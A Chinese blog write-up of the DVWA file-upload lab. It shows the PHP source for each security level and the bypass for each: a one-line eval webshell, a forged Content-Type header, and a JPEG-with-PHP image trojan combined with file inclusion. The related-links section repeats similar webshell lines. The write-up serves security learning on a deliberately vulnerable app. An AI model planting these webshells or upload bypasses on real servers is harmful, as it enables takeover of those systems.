关于那些Web漏洞--文件上传

于 2022-06-16 01:15:16 发布
阅读量122 收藏
点赞数
分类专栏: 漏洞原理 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shawdow_bug/article/details/125308218
版权

Low

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

basename($string[, $suffix]):返回路径中的文件名部分。如果文件名是以 suffix 结束的,那这一部分也会被去掉。
move_uploaded_file($filename, $destination):将上传的文件移动到新位置。
$_FILES:
1、$_FILES[“file”][“name”] - 被上传文件的名称
2、$_FILES[“file”][“type”] - 被上传文件的类型
3、$_FILES[“file”][“size”] - 被上传文件的大小,以字节计
4、$_FILES[“file”][“tmp_name”] - 存储在服务器的文件的临时副本的名称
5、$_FILES[“file”][“error”] - 由文件上传导致的错误代码
第一个参数为表单中的input name。

完全没有安全检查,直接上传webshell:

// shell.php
<?php eval($_POST['key']);?>

Medium

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

这次检查两个参数:$_FILES[‘uploaded’][‘type’]和$_FILES[‘uploaded’][‘size’],这里只考虑$_FILES[‘uploaded’][‘type’]即可。
绕过方法:修改http报文中的content-type。
上传一个php脚本文件,然后burpsuite捕获报文,修改其中的content-type为"image/jpeg"或者"image/png",最后发送。

High

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
        echo $_FILES['uploaded']['name'];
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

getimagesize($filename):取得图像大小。如果不能访问 filename 指定的图像或者其不是有效的图像,getimagesize() 将返回 FALSE 并产生一条 E_WARNING 级的错误。

增加了对后缀名的检查,网上说在php<5.3.4的环境下,可以用%00截断绕过,本人在phpstudy中切换版本时没能复现成功。这里只好上传一个图片马,图片马的制作:
(1)copy /b a.jpg+b.php c.jpg;(2)文本编辑器中在图片最后插入脚本。
上传成功后,再利用文件包含漏洞,将图片马包含进来就能解析里面的php脚本。文件包含时,可能遇到语法解析错误,对于jpg格式的图片,可以直接删除错误行所在的数据块。

Impossible

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    echo getcwd();
        echo "<br/>".DVWA_WEB_PAGE_TO_ROOT;
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

1、uniqid():获取一个带前缀、基于当前时间微秒数的唯一ID。
2、ini_get(): 获取一个配置选项的值。
3、sys_get_temp_dir():返回 PHP 储存临时文件的默认目录的路径。
4、imagecreatefromjpeg() / imagecreatefrompng():由文件或 URL 创建一个新图象。成功返回一图像标识符,代表了从给定的文件名取得的图像。
5、imagejpeg(resource $image [, string $filename ]) / imagepng():以 JPEG/PNG 格式将图像输出到浏览器或文件。将 GD 图像流(image)以 JPEG / PNG 格式输出到标准输出(通常为浏览器),或者如果用 filename 给出了文件名则将其输出到该文件。
6、imagedestroy($image):销毁一图像,释放与 image 关联的内存。
7、unlink($filename):删除文件。
8、rename($oldname,$newname):重命名一个文件或目录。(移动并重命名)
9、getcwd():取得当前工作目录。

除了检查后缀名,还对文件进行重命名,即使上传了图片,也找不到文件所在位置,因而也就无法利用了。

friEnd`
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防入门---文件漏洞及防御
濯君
12-27 820
一:下载相应的工具 VMware Kali linux2020.3下载与安装详细教程 OWASP Broken Web Apps渗透测试环境搭建和安装教程 中国菜刀下载 二:主要是使用靶机OWASP Broken Web Apps中的Damn Vulnerable Web App作为攻击目标,其中的upload存在文件漏洞 其中的DVWA Security可以设置安全等级,共有三个安全等级low,medium,high 三:low安全等级 此安全等级下的upload源码 <?php
web文件漏洞
qq_46258964的博客
12-13 871
文件漏洞 文件本身不是漏洞,但是没有过滤能上一句话木马就造成了漏洞, 一句话木马: 一句话木马简洁,功能强大,在上中有很大入侵作用。 常见的一句话php木马 <?php @eval($_REQUEST['cmd']);?> <?php @eval($_GET['cmd']);?> <?php @eval($_POST['cmd']);?> 当然还有其他的木马jsp等 图片马 图片马是一句话木马加上图片构造的木马 在路径下准备好一句话木马.php和一张图片 .
files php 参数,了解 php 上文件 $_FILES['']['type']的值
weixin_39638526的博客
03-25 229
function upload_file($fname,$ftype,$fsize,$ferror,$ftmp_name,$fpath){date_default_timezone_set('PRC');$store_nm = date("YmdHis") . "-" . rand(10000,99999) . "-". strlen($fname)."-$fname";if($fname){if...
使用$_FILES获取上文件信息 (PHP)
Missy_xw2018的博客
06-04 2万+
在PHP中,文件功能的实现步骤: (1)在网页中上表单,单击“上”按钮后,选择的文件数据将发送到服务器。 (2)用$_FILES获取上文件有关的各种信息。 (3)用文件处理函数对上文件进行后续处理。 说明: (1)如果表单中有文件域,则定义表单时必须设置enctype="multipart/form-data",且必须为POST方式发送。 (2)限制文件大小可在表单中添加一个...
文件解析与上文件解析与文件漏洞知识总结v1.0
Monsterlz123的博客
06-19 1041
文件解析与上文件解析与文件漏洞学习总结v1.0 Hello,各位小伙伴大家好~ 这里是依旧勤劳写公众号的小编~ 今天本公众号将推出一个新的模块,那就是漏洞知识点总结模块!!! 该模块的文章会总结各种类型的漏洞的基础理论知识,并且文章内容会不断修改,不断完善,因此该模块文章带版本号,如v1.0。 话不多说,让我们直接开始本期的内容吧~ 一、文件漏洞 1、什么是文件漏洞? 大...
渗透测试笔记(一)——文件漏洞渗透及防御
m0_67044952的博客
06-06 1010
测试渗透机:Kali-Linux-2021.4a-vmware-amd64目标靶机:OWASP Broken Web Application VM 1.2 如果恶意文件如PHP、ASP等执行文件绕过Web应用并顺利执行,则相当于黑客拿到了Webshell。一旦黑客拿到Webshell,则可以拿到Web应用数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网。SQL注入攻击对象是数据库服务,文件漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制。下面是一个文件界面,可以上图像,
Go-markdown文件在线浏览工具
08-14
4. **文件与读取**:为了加载用户的Markdown文件,工具需要处理文件和读取操作。这通常涉及使用`os`和`io`包来读取本地文件,以及处理HTTP请求中的文件部分。 5. **安全考虑**:在处理用户上文件时...
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
2. **识别SSRF**:通过检查Web接口,比如存在对外部资源访问的接口(如图片、文件等),或者内部端口(如80、8080)的开放,可以识别SSRF漏洞。 3. **指纹识别**:攻击者可以通过尝试不同的payload来探测目标...
hfs文件工具-便于文件共享
04-19
【标题】"HFS文件工具"是一款便捷的文件共享软件,主要针对的是那些需要快速、简单地将文件分享给他人或团队的用户。这款工具以其直观的操作界面和高效的文件输能力,使得文件共享变得更加轻松。 【描述】...
其他类别MeyboMail Web开源简化版-meybomailweb.zip
10-27
3. **解压和上**:将压缩包解压后,将文件Web服务器的根目录。 4. **配置数据库**:在数据库中创建MeyboMail Web所需的表结构,并记录数据库连接信息。 5. **配置文件**:编辑config.php文件,填入服务器...
QuiXplorer - web-based file-management-开源
05-30
**QuiXplorer** 是一款基于Web文件管理系统,它提供了用户友好的界面,使得用户能够通过浏览器进行远程...总的来说,QuiXplorer 提供了一个强大且灵活的Web文件管理解决方案,尤其适合那些寻求开源替代方案的用户。
PHP文件漏洞原理以及防御姿势
Hvnt3r的博客
06-11 1万+
PHP文件漏洞 本文用到的代码地址:https://github.com/Levones/PHP_file_upload_vlun,好评请给小星星,谢谢各位大佬! 0x00 漏洞描述 ​ 在实际开发过程中文件的功能时十分常见的,比如博客系统用户需要文件功能来上自己的头像,写博客时需要上图片来丰富自己的文章,购物系统在识图搜索时也需要上图片等,文件功能固然重要,但是...
Upload-labs文件漏洞(图片渲染)——Pass16
Zichel77的博客
08-04 685
0×00 题目概述 不太明白什么叫渲染 0×01 源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name']; $filetype = $_FILES['upload_file']['type']; $tmpname = $_FILE.
【DVWA】File Upload(文件漏洞)通关教程
weixin_30527551的博客
08-01 1229
日期:2019-08-01 17:28:33 更新: 作者:Bay0net 介绍: 0x01、 漏洞介绍 在渗透测试过程中,能够快速获取服务器权限的一个办法。 如果开发者对上的内容过滤的不严,那么就会存在任意文件漏洞,就算不能解析,也能挂个黑页,如果被 fghk 利用的话,会造成很不好的影响。 如果上文件,还能够解析,或者配合文件包含漏洞,那么就能获取到服务...
MIME类型大全
浩瀚星空,法力无边;其大无外,其小无内。
12-07 1339
123 application/vnd.lotus-1-2-33gp video/3gppaab application/x-authoware-binaam application/x-authoware-mapaas application/x-authoware-segai application/postscriptaif audio/x-aiffaifc audio/x-aiffaiff
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1611
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
文件绕过】——二次渲染漏洞
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
DVWA & File Upload文件最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
DVWA-File Upload/文件漏洞
jammny
11-22 1002
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
文件漏洞关注点在那些地方
最新发布
05-17
文件漏洞是指攻击者通过上恶意文件来执行任意代码或获取系统权限的安全漏洞。在文件过程中,攻击者可以通过各种方式绕过验证和过滤机制,将恶意文件至服务器,导致服务器被攻击控制。 以下是文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值